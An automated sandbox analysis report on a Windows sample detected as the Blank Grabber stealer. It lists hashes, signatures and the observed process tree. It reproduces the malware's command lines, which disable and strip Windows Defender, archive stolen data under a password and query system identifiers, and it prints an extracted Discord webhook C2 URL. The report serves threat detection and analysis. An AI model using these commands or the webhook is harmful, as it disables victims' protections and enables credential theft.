Edit tour
Windows
Analysis Report
riFSkYVMKB.exe
Overview
General Information
| Sample name: | riFSkYVMKB.exerenamed because original name is a hash value |
| Original sample name: | f139e085653967253d9a7159a3664dd986a69570540375d39a10df1fa49b8fe4.exe |
| Analysis ID: | 1584120 |
| MD5: | 90ee30fccafac811f40981a0e895d7f0 |
| SHA1: | 1517871794b795207d8cfa243c44bda048dcf40d |
| SHA256: | f139e085653967253d9a7159a3664dd986a69570540375d39a10df1fa49b8fe4 |
| Tags: | exeuser-zhuzhu0009 |
| Infos: |   |
 | |
Detection
Blank Grabber
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected Blank Grabber
Yara detected Telegram RAT
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Found many strings related to Crypto-Wallets (likely being stolen)
Loading BitLocker PowerShell Module
Modifies Windows Defender protection settings
Removes signatures from Windows Defender
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Powershell Defender Disable Scan Feature
Sigma detected: Rar Usage with Password and Compression Level
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Binary contains a suspicious time stamp
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Classification
- System is w10x64
riFSkYVMKB.exe (PID: 5144 cmdline: "C:\Users\ user\Deskt op\riFSkYV MKB.exe" MD5: 90EE30FCCAFAC811F40981A0E895D7F0) - riFSkYVMKB.exe (PID: 6800 cmdline:
"C:\Users\ user\Deskt op\riFSkYV MKB.exe" MD5: 90EE30FCCAFAC811F40981A0E895D7F0) 
cmd.exe (PID: 6768 cmdline: C:\Windows \system32\ cmd.exe /c "powershe ll -Comman d Add-MpPr eference - ExclusionP ath 'C:\Us ers\user\D esktop\riF SkYVMKB.ex e'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 6804 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) 
powershell.exe (PID: 5776 cmdline: powershell -Command Add-MpPref erence -Ex clusionPat h 'C:\User s\user\Des ktop\riFSk YVMKB.exe' MD5: 04029E121A0CFA5991749937DD22A1D9) 
WmiPrvSE.exe (PID: 7404 cmdline: C:\Windows \system32\ wbem\wmipr vse.exe -s ecured -Em bedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51) - cmd.exe (PID: 6012 cmdline:
C:\Windows \system32\ cmd.exe /c "powershe ll Set-MpP reference -DisableIn trusionPre ventionSys tem $true -DisableIO AVProtecti on $true - DisableRea ltimeMonit oring $tru e -Disable ScriptScan ning $true -EnableCo ntrolledFo lderAccess Disabled -EnableNet workProtec tion Audit Mode -Forc e -MAPSRep orting Dis abled -Sub mitSamples Consent Ne verSend && powershel l Set-MpPr eference - SubmitSamp lesConsent 2 & "%Pro gramFiles% \Windows D efender\Mp CmdRun.exe " -RemoveD efinitions -All" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 6892 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 5676 cmdline:
powershell Set-MpPre ference -D isableIntr usionPreve ntionSyste m $true -D isableIOAV Protection $true -Di sableRealt imeMonitor ing $true -DisableSc riptScanni ng $true - EnableCont rolledFold erAccess D isabled -E nableNetwo rkProtecti on AuditMo de -Force -MAPSRepor ting Disab led -Submi tSamplesCo nsent Neve rSend MD5: 04029E121A0CFA5991749937DD22A1D9) 
MpCmdRun.exe (PID: 8024 cmdline: "C:\Progra m Files\Wi ndows Defe nder\MpCmd Run.exe" - RemoveDefi nitions -A ll MD5: B3676839B2EE96983F9ED735CD044159) - cmd.exe (PID: 1512 cmdline:
C:\Windows \system32\ cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 2820 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - tasklist.exe (PID: 7268 cmdline:
tasklist / FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA) - cmd.exe (PID: 4200 cmdline:
C:\Windows \system32\ cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 7172 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - tasklist.exe (PID: 7292 cmdline:
tasklist / FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA) - cmd.exe (PID: 7476 cmdline:
C:\Windows \system32\ cmd.exe /c "C:\Users \user\AppD ata\Local\ Temp\_MEI5 1442\rar.e xe a -r -h p"blank123 " "C:\User s\user\App Data\Local \Temp\0ddI p.zip" *" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 7492 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - rar.exe (PID: 7528 cmdline:
C:\Users\u ser\AppDat a\Local\Te mp\_MEI514 42\rar.exe a -r -hp" blank123" "C:\Users\ user\AppDa ta\Local\T emp\0ddIp. zip" * MD5: 9C223575AE5B9544BC3D69AC6364F75E) - cmd.exe (PID: 7580 cmdline:
C:\Windows \system32\ cmd.exe /c "wmic os get Captio n" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 7592 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - WMIC.exe (PID: 7672 cmdline:
wmic os ge t Caption MD5: C37F2F4F4B3CD128BDABCAEB2266A785) - cmd.exe (PID: 7716 cmdline:
C:\Windows \system32\ cmd.exe /c "wmic com putersyste m get tota lphysicalm emory" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 7732 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - WMIC.exe (PID: 7768 cmdline:
wmic compu tersystem get totalp hysicalmem ory MD5: C37F2F4F4B3CD128BDABCAEB2266A785) - cmd.exe (PID: 7800 cmdline:
C:\Windows \system32\ cmd.exe /c "wmic csp roduct get uuid" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 7816 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - WMIC.exe (PID: 7856 cmdline:
wmic cspro duct get u uid MD5: C37F2F4F4B3CD128BDABCAEB2266A785) - cmd.exe (PID: 7888 cmdline:
C:\Windows \system32\ cmd.exe /c "powershe ll Get-Ite mPropertyV alue -Path 'HKLM:Sys tem\Curren tControlSe t\Control\ Session Ma nager\Envi ronment' - Name PROCE SSOR_IDENT IFIER" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 7900 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 7948 cmdline:
powershell Get-ItemP ropertyVal ue -Path ' HKLM:Syste m\CurrentC ontrolSet\ Control\Se ssion Mana ger\Enviro nment' -Na me PROCESS OR_IDENTIF IER MD5: 04029E121A0CFA5991749937DD22A1D9) - cmd.exe (PID: 8048 cmdline:
C:\Windows \system32\ cmd.exe /c "wmic pat h win32_Vi deoControl ler get na me" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 8064 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - WMIC.exe (PID: 8108 cmdline:
wmic path win32_Vide oControlle r get name MD5: C37F2F4F4B3CD128BDABCAEB2266A785) - cmd.exe (PID: 8148 cmdline:
C:\Windows \system32\ cmd.exe /c "powershe ll Get-Ite mPropertyV alue -Path 'HKLM:SOF TWARE\Micr osoft\Wind ows NT\Cur rentVersio n\Software Protection Platform' -Name Back upProductK eyDefault" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 8164 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 7020 cmdline:
powershell Get-ItemP ropertyVal ue -Path ' HKLM:SOFTW ARE\Micros oft\Window s NT\Curre ntVersion\ SoftwarePr otectionPl atform' -N ame Backup ProductKey Default MD5: 04029E121A0CFA5991749937DD22A1D9)
- cleanup
{"C2 url": "https://discord.com/api/webhooks/1325008109688848394/ap33zUqBiGzDvwCP0tF85_LvY8CYm5iFLtVRNIJg4zgkMF4A54M4Y9NXhJ9mbH2Zi-eA"}| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_BlankGrabber | Yara detected Blank Grabber | Joe Security |
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_BlankGrabber | Yara detected Blank Grabber | Joe Security | ||
| JoeSecurity_BlankGrabber | Yara detected Blank Grabber | Joe Security | ||
| JoeSecurity_BlankGrabber | Yara detected Blank Grabber | Joe Security | ||
| JoeSecurity_BlankGrabber | Yara detected Blank Grabber | Joe Security | ||
| JoeSecurity_BlankGrabber | Yara detected Blank Grabber | Joe Security | ||
| Click to see the 5 entries | ||||
System Summary |   |
|---|
| Source: | Author: Florian Roth (Nextron Systems): | ||
| Source: | Author: Florian Roth (Nextron Systems): | ||
| Source: | Author: @ROxPinTeddy: | ||
| Source: | Author: Florian Roth (Nextron Systems): | ||
| Source: | Author: Timur Zinniatullin, E.M. Anhaus, oscd.community: | ||
| Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): | ||
⊘No Suricata rule has matched
Click to jump to signature section
Show All Signature Results
AV Detection | |
|---|
| Source: | Malware Configuration Extractor: | ||
| Source: | Virustotal: | Perma Link | ||
| Source: | ReversingLabs: | |||
| Source: | Integrated Neural Analysis Model: | ||
| Source: | Code function: | 18_2_00007FF68A21901C | |
| Source: | Static PE information: | ||
| Source: | Binary string: | ||
| Source: | Binary string: | ||
| Source: | Binary string: | ||
| Source: | Binary string: | ||
| Source: | Binary string: | ||
| Source: | Binary string: | ||
| Source: | Binary string: | ||
| Source: | Binary string: | ||
| Source: | Binary string: | ||